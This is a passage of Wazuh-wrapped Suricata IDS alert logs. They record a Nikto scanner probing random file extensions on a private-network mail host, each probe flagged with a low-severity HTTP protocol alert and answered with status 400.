(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.382662+0000","flow_id":"268736087642508.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46970","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.10:100","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.385406+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":18,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.32165","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.385406+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46972,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.385406+0000","flow_id":"1931339402763667.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46972","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nsf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.388338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":19,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.33703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.388338+0000\",\"flow_id\":2192726817433916,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46974,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.render_warning_screen\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.388338+0000","flow_id":"2192726817433916.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46974","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.render_warning_screen","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.390615+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":20,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.35277","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.390615+0000\",\"flow_id\":769894346584834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46976,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.phtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.390615+0000","flow_id":"769894346584834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46976","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.phtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.393834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":21,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.36817","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.393834+0000\",\"flow_id\":1990996498513606,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46978,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bin\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.393834+0000","flow_id":"1990996498513606.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46978","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bin","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.396042+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":22,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.38355","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.396042+0000\",\"flow_id\":1431362259781643,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46980,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.396042+0000","flow_id":"1431362259781643.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46980","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.399022+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":23,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.39893","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.399022+0000\",\"flow_id\":2013892969108308,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46982,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.399022+0000","flow_id":"2013892969108308.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46982","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.401306+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":24,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.41431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.401306+0000\",\"flow_id\":1806467523550245,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46984,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.html\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.401306+0000","flow_id":"1806467523550245.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46984","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.html","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.403790+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":25,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.42971","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.403790+0000\",\"flow_id\":1045261879748187,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46986,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.thtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.403790+0000","flow_id":"1045261879748187.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46986","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.thtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.406521+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":26,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.44513","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.406521+0000\",\"flow_id\":2137592322207186,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46988,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.AP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.406521+0000","flow_id":"2137592322207186.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46988","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.AP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.408739+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":27,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.46049","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.408739+0000\",\"flow_id\":491335652620395,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46990,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp-1251\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.408739+0000","flow_id":"491335652620395.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46990","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp-1251","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.411490+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":28,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.47593","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.411490+0000\",\"flow_id\":418346978395032,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46992,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.blt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.411490+0000","flow_id":"418346978395032.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46992","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.blt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.414228+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":29,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.49129","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.414228+0000\",\"flow_id\":984986308726290,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46994,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/.bISn4adA\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.414228+0000","flow_id":"984986308726290.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46994","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/.bISn4adA","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.416379+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":30,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.50659","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.416379+0000\",\"flow_id\":1450801281783779,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46996,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.show_query_columns\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.416379+0000","flow_id":"1450801281783779.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46996","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.show_query_columns","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.418630+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":31,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.52227","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.418630+0000\",\"flow_id\":391417533456539,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46998,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dtd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.418630+0000","flow_id":"391417533456539.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46998","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dtd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.429055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":32,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.53763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.429055+0000\",\"flow_id\":1722213150132363,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47002,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.429055+0000","flow_id":"1722213150132363.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47002","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.420714+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 